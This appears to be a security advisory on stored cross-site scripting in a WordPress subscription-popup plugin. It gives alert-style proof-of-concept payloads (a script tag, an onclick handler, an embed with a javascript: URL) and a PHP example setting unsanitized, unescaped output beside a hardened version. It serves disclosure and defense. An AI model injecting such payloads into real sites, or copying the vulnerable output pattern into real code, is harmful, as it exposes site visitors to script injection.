The plugin does not sanitize or escape some of its settings, which could allow high-privilege users (e.g. administrators) to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in a multisite setup).
Create or edit a subscription, enable the GDPR options in it and add one of the following payloads in the "confirmation text" setting:

Versions < 4.1.10:
<script>alert(/XSS/)</script>

Versions >= 4.1.10 (the script tag is no longer sufficient, but event handler attributes still are):
<input class='js-subs-submit-btn' onclick='javascript:alert(/XSS/)' type='submit' value='Subscribe' style='width:300px;height:40px;background-color:#007fe1 !important;color:#FFFFFF;border-radius:4px !important;border-width:0px !important;border-color:#007fe1 !important;text-transform:none !important;border-style:solid'/>

Backend only (triggers when updating the Popup after the confirmation text has been changed):
<embed src='javascript:alert(/XSS/)'>

The XSS is triggered when viewing or previewing the subscription popup (and, for versions >= 4.1.10, when clicking the injected Subscribe button).
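The root cause above is a setting that is stored and echoed without filtering. The following added example (not the plugin's own code) shows that pattern next to a hardened version using core WordPress APIs; the option name `demo_popup_confirmation_text` and the `demo_*` function names are assumptions for illustration.

```php
<?php
// Added example, not the plugin's code. Option and function names are
// hypothetical; the WordPress functions used are core APIs.

// --- Vulnerable pattern ---------------------------------------------------
// The raw setting is saved and echoed verbatim. A high-privilege user who
// lacks unfiltered_html (e.g. on multisite) can still store <script>, an
// onclick= handler or a javascript: URL that runs for anyone viewing the popup.
function demo_save_confirmation_text_unsafe( $value ) {
    update_option( 'demo_popup_confirmation_text', $value ); // no sanitization
}

function demo_render_popup_unsafe() {
    echo '<div class="popup-confirmation">'
        . get_option( 'demo_popup_confirmation_text' )        // no escaping
        . '</div>';
}

// --- Hardened pattern ------------------------------------------------------
// 1. Sanitize on save. Users who hold unfiltered_html keep the freedom core
//    already gives them in the post editor; everyone else goes through
//    wp_kses_post(), which strips <script>, <embed>, on* event attributes and
//    javascript: URLs while keeping ordinary formatting markup.
function demo_sanitize_confirmation_text( $value ) {
    $value = (string) $value;
    if ( current_user_can( 'unfiltered_html' ) ) {
        return $value;
    }
    return wp_kses_post( $value );
}

add_action( 'admin_init', function () {
    register_setting(
        'demo_popup_settings',          // hypothetical option group
        'demo_popup_confirmation_text', // hypothetical option name
        array(
            'type'              => 'string',
            'sanitize_callback' => 'demo_sanitize_confirmation_text',
            'default'           => '',
        )
    );
} );

// 2. Escape on output, according to the context the value lands in. Values
//    stored before the fix are still in the database, so output escaping must
//    not rely on the save path alone.
function demo_render_popup() {
    $text = get_option( 'demo_popup_confirmation_text', '' );
    // Rich text inside an element: filter again so legacy values are covered.
    echo '<div class="popup-confirmation">' . wp_kses_post( $text ) . '</div>';
}

function demo_render_subscribe_button( $label ) {
    // A value placed in an attribute needs attribute escaping, which
    // neutralises a closing quote followed by onclick=...
    echo '<input class="js-subs-submit-btn" type="submit" value="'
        . esc_attr( $label ) . '" />';
}
```

If the confirmation text is meant to be plain text rather than limited HTML, replace `wp_kses_post()` with `sanitize_text_field()` on save and `esc_html()` on output; the split between a capability check on save and unconditional escaping on output stays the same.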
Pritam Dash
Yes
2022-06-20